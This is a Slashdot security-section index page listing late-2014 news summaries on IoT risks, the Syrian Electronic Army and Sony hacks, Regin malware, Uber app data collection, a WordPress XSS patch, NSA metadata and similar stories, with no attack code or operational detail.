×

Announcing: Slashdot Deals - Explore geek apps, games, gadgets and more. (what is this?)

Thank you!

We are sorry to see you leave - Beta is different and we value the time you took to try it out. Before you decide to go, please take a look at some value-adds for Beta and learn more about it. Thank you for reading Slashdot, and for making the site better!

  • Security Experts Believe the Internet of Things Will Be Used To Kill Someone

    dcblogs writes: Imagine a fleet of quad copters or drones equipped with explosives and controlled by terrorists. Or someone who hacks into a connected insulin pump and changes the settings in a lethal way. Or maybe the hacker who accesses a building's furnace and thermostat controls and runs the furnace full bore until a fire is started. Those may all sound like plot material for a James Bond movie, but there are security experts who now believe, as does Jeff Williams, CTO of Contrast Security, that "the Internet of Things will kill someone". Today, there is a new "rush to connect things" and "it is leading to very sloppy engineering from a security perspective," said Williams. Similarly, Rashmi Knowles, chief security architect at RSA, imagines criminals hacking into medical devices, recently blogged about hackers using pacemakers to blackmail users, and asked: "Question is, when is the first murder?"

    95 comments | 3 hours ago

  • Syrian Electronic Army Takes Credit For News Site Hacking

    New submitter ddtmm writes The Syrian Electronic Army is claiming responsibility for the hacking of multiple news websites, including CBC News. Some users trying to access the CBC website reported seeing a pop-up message reading: "You've been hacked by the Syrian Electronic Army (SEA)." It appears the hack targeted a network used by many news organizations and businesses. A tweet from an account appearing to belong to the Syrian Electronic Army suggested the attacks were meant to coincide with the U.S. Thanksgiving on Thursday. The group claimed to have used the domain Gigya.com, a company that offers businesses a customer identity management platform, to hack into other sites via GoDaddy, its domain registrar. Gigya is "trusted by more than 700 leading brands," according to its website. The hacker or hackers redirected sites to the Syrian Electronic Army image that users saw. Gigya's operations team released a statement Thursday morning saying that it identified an issue with its domai registrar at 6:45 a.m. ET. The breach "resulted in the redirect of the Gigya.com domain for a subset of users," the company said. Among the websites known to be hacked so far are New York Times, Chicago Tribune, CNBC, PC World, Forbes, The Telegraph, Walmart and Facebook.

    20 comments | yesterday

  • Uber's Android App Caught Reporting Data Back Without Permission

    Zothecula writes Security researcher GironSec has pulled Uber's Android app apart and discovered that it's sending a huge amount of personal data back to base – including your call logs, what apps you've got installed, whether your phone is vulnerable to certain malware, whether your phone is rooted, and your SMS and MMS logs, which it explicitly doesn't have permission to do. It's the latest in a series of big-time missteps for a company whose core business model is, frankly, illegal in most of its markets as well.

    221 comments | yesterday

  • Ask Slashdot: Best Biometric Authentication System?

    kwelch007 writes I run a network for a company that does manufacturing primarily in a clean-room. We have many systems in place that track countless aspects of every step. However, we do not have systems in place to identify the specific user performing the step. I could do this easily, but asking users to input their AD login every time they perform a task is a time-waster (we have "shared" workstations throughout.) My question is, what technologies are people actually using successfully for rapid authentication? I've thought about fingerprint scanners, but they don't work because in the CR we have to wear gloves. So, I'm thinking either face-recognition or retinal scans...but am open to other ideas if they are commercially viable.

    125 comments | 2 days ago

  • Bitcoin Is Not Anonymous After All

    Taco Cowboy points out a new study that shows it is possible to figure out the IP address of someone who pays for transactions anonymously online using bitcoins. "The Bitcoin system is not managed by a central authority, but relies on a peer-to-peer network on the Internet. Anyone can join the network as a user or provide computing capacity to process the transactions. In the network, the user's identity is hidden behind a cryptographic pseudonym, which can be changed as often as is wanted. Transactions are signed with this pseudonym and broadcast to the public network to verify their authenticity and attribute the Bitcoins to the new owner. In their new study, researchers at the Laboratory of Algorithmics, Cryptology and Security of the University of Luxembourg have shown that Bitcoin does not protect user's IP address and that it can be linked to the user's transactions in real-time. To find this out, a hacker would need only a few computers and about €1500 per month for server and traffic costs. Moreover, the popular anonymization network "Tor" can do little to guarantee Bitcoin user's anonymity, since it can be blocked easily."

    114 comments | 2 days ago

  • Clarificiation on the IP Address Security in Dropbox Case

    Bennett Haselton writes A judge rules that a county has to turn over the IP addresses that were used to access a county mayor's Dropbox account, stating that there is no valid security-related reason why the IP addresses should be exempt from a public records request. I think the judge's conclusion about IP addresses was right, but the reasoning was flawed; here is a technically more correct argument that would have led to the same answer. Keep Reading to see what Bennett has to say about the case.

    147 comments | 2 days ago

  • Auto Industry Teams Up With Military To Stop Car Hacking

    An anonymous reader writes: A team of hackers is collaborating with military and industry groups to develop cyber security defenses for commercially available cars, in response to a growing threat from criminals and terrorists. In the U.K., hackers are now responsible for a third of car thefts in London and there are fears that while technology is progressing, older models will remain vulnerable to attack. Although there have been no reported instances of a car being completely commandeered outside of controlled conditions, during tests hackers come out on top every time – unlocking car boots, setting off windscreen wipers, locking brakes, and cutting the engine.

    112 comments | 2 days ago

  • The People Who Are Branding Vulnerabilities

    antdude points out a story at ZDNet about how the naming of security vulnerabilities and exploits has evolved into branding and awareness campaigns. Heartbleed set the trend early this year, having a distinct name and logo to represent a serious security problem. It seemed to work; the underlying bug got massive exposure, even in the mainstream media. This raises a new set of issues — should the response to the disclosure of a vulnerability be dependent on how catchy its name is? No, but it probably will be. Heartbleed charmed the public, and in a way, it was designed to do so. By comparison Shellshock, POODLE (aka clumsy "Poodlebleed"), Sandworm, the secretively named Rootpipe, Winshock, and other vulns seem like proverbial "red headed stepchildren" — despite the fact that each of these vulns are critical issues, some are worse than Heartbleed, and all of which needed fast responses. The next "big bug" after Heartbleed was Shellshock — real name CVE-2014-6271. Shellshock didn't have a company's pocketbook or marketing team behind it. So, despite the fact that many said Shellshock was worse than Heartbleed (rated high on severity but low on complexity, making it easy for attackers), creating a celebrity out of Shellshock faced an uphill climb.

    64 comments | 2 days ago

  • Cameron Accuses Internet Companies Of Giving Terrorists Safe Haven

    An anonymous reader writes with this snippet from The Guardian: "Internet companies are allowing their networks to be used to plot "murder and mayhem", David Cameron has said in response to the official inquiry into the intelligence agencies' actions ahead of the killing of Lee Rigby. He demanded that internet companies live up to their social responsibilities to report potential terror threats and said there was no reason for such firms to be willing to cooperate with state agencies over child abuse but not over combatting terrorism. His comments to the House of Commons came after the parliamentary intelligence and security committee concluded that the brutal murder of Rigby could have been prevented if an internet company had passed on an online exchange in which one of the killers expressed "in the most graphic terms" his intention to carry out an Islamist jihadi attack.

    178 comments | 3 days ago

  • Sony Pictures Computer Sytems Shut Down After Ransomware Hack

    MojoKid writes: It appears that Sony Pictures has become the victim of a massive ransomware hack, which has resulted in the company basically shutting down its IT infrastructure. According to an unnamed source, every computer in Sony's New York Office, and every Sony Pictures office across the nation, bears an image from the hacker with the headline "Hacked By #GOP" which is then followed by a warning. The hacker, or group, claims to have obtained corporate secrets and has threatened to reveal those secrets if Sony doesn't meet their demands.

    154 comments | 3 days ago

  • How the Pentagon's Robots Would Automate War

    rossgneumann writes: Pentagon officials are worried that the U.S. military is losing its edge compared to competitors like China, and are willing to explore almost anything to stay on top—including creating robots capable of becoming fighting machines. A 72-page document throws detailed light on the far-reaching implications of the Pentagon's plan to monopolize imminent "transformational advances" in biotechnology, robotics and artificial intelligence, information technology, nanotechnology, and energy.

    116 comments | 3 days ago

  • Regin Malware In EU Attack Linked To US and British Intelligence Agencies

    Advocatus Diaboli writes The Regin malware, whose existence was first reported by the security firm Symantec on Sunday, is among the most sophisticated ever discovered by researchers. Symantec compared Regin to Stuxnet, a state-sponsored malware program developed by the U.S. and Israel to sabotage computers at an Iranian nuclear facility. Sources familiar with internal investigations at Belgacom and the European Union have confirmed to The Intercept that the Regin malware was found on their systems after they were compromised, linking the spy tool to the secret GCHQ and NSA operations.

    129 comments | 3 days ago

  • Google Chrome Will Block All NPAPI Plugins By Default In January

    An anonymous reader writes Google today provided an update on its plan to remove Netscape Plugin Application Programming Interface (NPAPI) from Chrome, which the company says will improve the browser's security, speed, and stability, as well as reduce complexity in the code base. In short, the latest timeline is as follows: Block all plugins by default in January 2015, disable support in April 2015, and remove support completely in September 2015. For context, Google first announced in September 2013 that it was planning to drop NPAPI. At the time, Google said anonymous Chrome usage data showed just six NPAPI plugins were used by more than 5 percent of users, and the company was hoping to remove support from Chrome "before the end of 2014, but the exact timing will depend on usage and user feedback."

    107 comments | 3 days ago

  • DHS Set To Destroy "Einstein" Surveillance Records

    schwit1 sends word that The Department of Homeland Security plans on disposing of all the records from a 3-year-long surveillance program without letting the public have access to them. The Department of Homeland Security is poised to ditch all records from a controversial network monitoring system called "Einstein" that are at least three years old, but not for security reasons. DHS reasons the files — which include data about traffic to government websites, agency network intrusions and general vulnerabilities — have no research significance. But some security experts say, to the contrary, DHS would be deleting a treasure chest of historical threat data. And privacy experts, who wish the metadata wasn't collected at all, say destroying it could eliminate evidence that the government wide surveillance system does not perform as intended. The National Archives and Records Administration has tentatively approved the disposal plan, pending a public comment period.

    71 comments | 3 days ago

  • Book Review: Bulletproof SSL and TLS

    benrothke writes If SSL is the emperor's new clothes, then Ivan Ristic in Bulletproof SSL and TLS has shown that perhaps the emperor isn't wearing anything at all. There is a perception that if a web site is SSL secured, then it's indeed secure. Read a few pages in this important book, and the SSL = security myth is dispelled. For the first 8 of the 16 chapters, Ristic, one of the greatest practical SSL./TLS experts around, spends 230 pages showing countless weaknesses, vulnerabilities, attacks and other SSL weaknesses. He then spends the next 8 chapters showing how SSL can, if done correctly, be deployed to provide adequate security. Keep reading for the rest of Ben's review.

    90 comments | 3 days ago

  • Nuclear Weapons Create Their Own Security Codes With Radiation

    Zothecula writes "Nuclear weapons are a paradox. No one in their right mind wants to use one, but if they're to act as a deterrent, they need to be accessible. The trick is to make sure that access is only available to those with the proper authority. To prevent a real life General Jack D Ripper from starting World War III, Livermore National Laboratory's (LLNL) Defense Technologies Division is developing a system that uses a nuclear weapon's own radiation to protect itself from tampering.

    104 comments | 4 days ago

  • Highly Advanced Backdoor Trojan Cased High-Profile Targets For Years

    An anonymous reader points out this story at Ars about a new trojan on the scene. Researchers have unearthed highly advanced malware they believe was developed by a wealthy nation-state to spy on a wide range of international targets in diverse industries, including hospitality, energy, airline, and research. Backdoor Regin, as researchers at security firm Symantec are referring to the trojan, bears some resemblance to previously discovered state-sponsored malware, including the espionage trojans known as Flame and Duqu, as well as Stuxnet, the computer worm and trojan that was programmed to disrupt Iran's nuclear program. Regin likely required months or years to be completed and contains dozens of individual modules that allowed its operators to tailor the malware to individual targets.

    142 comments | 4 days ago

  • Critical XSS Flaws Patched In WordPress and Popular Plug-In

    itwbennett writes The WordPress development team on Thursday released critical security updates that address an XSS vulnerability in the comment boxes of WordPress posts and pages. An attacker could exploit this flaw to create comments with malicious JavaScript code embedded in them that would get executed by the browsers of users seeing those comments. 'In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue,' said Jouko Pynnonen, the security researcher who found the flaw.

    41 comments | about a week ago

  • Top NSA Official Raised Alarm About Metadata Program In 2009

    An anonymous reader sends this report from the Associated Press: "Dissenters within the National Security Agency, led by a senior agency executive, warned in 2009 that the program to secretly collect American phone records wasn't providing enough intelligence to justify the backlash it would cause if revealed, current and former intelligence officials say.

    The NSA took the concerns seriously, and many senior officials shared them. But after an internal debate that has not been previously reported, NSA leaders, White House officials and key lawmakers opted to continue the collection and storage of American calling records, a domestic surveillance program without parallel in the agency's recent history.

    110 comments | about a week ago

  • Obama's Immigration Order To Give Tech Industry Some, Leave 'Em Wanting More

    theodp writes: "The high-tech industry," reports the Washington Post's Nancy Scola, "will have at least two things to be happy about in President Obama's speech outlining executive actions he'll take on immigration. The president plans to grant the tech industry some, but not nearly all, of what it has been after in the immigration debate. The first is aimed at increasing the opportunity for foreign students and recent graduates from U.S. schools to work in high-tech jobs in the United States. And the second is aimed at making it easier for foreign-born entrepreneurs to set up shop in the United States. According to the White House, Obama will direct the Department of Homeland Security to help students in the so-called STEM fields — science, technology, engineering and mathematics — by proposing, per a White House fact sheet released Thursday night, to "expand and extend" the controversial Optional Practical Training program that now allows foreign-born STEM students and recent graduates remain in the United States for up to 29 months. The exact details of that expansion will be worked out by the Department of Homeland Security as it goes through a rulemaking process."

    186 comments | about a week ago

Slashdot Login

Need an Account?

Forgot your password?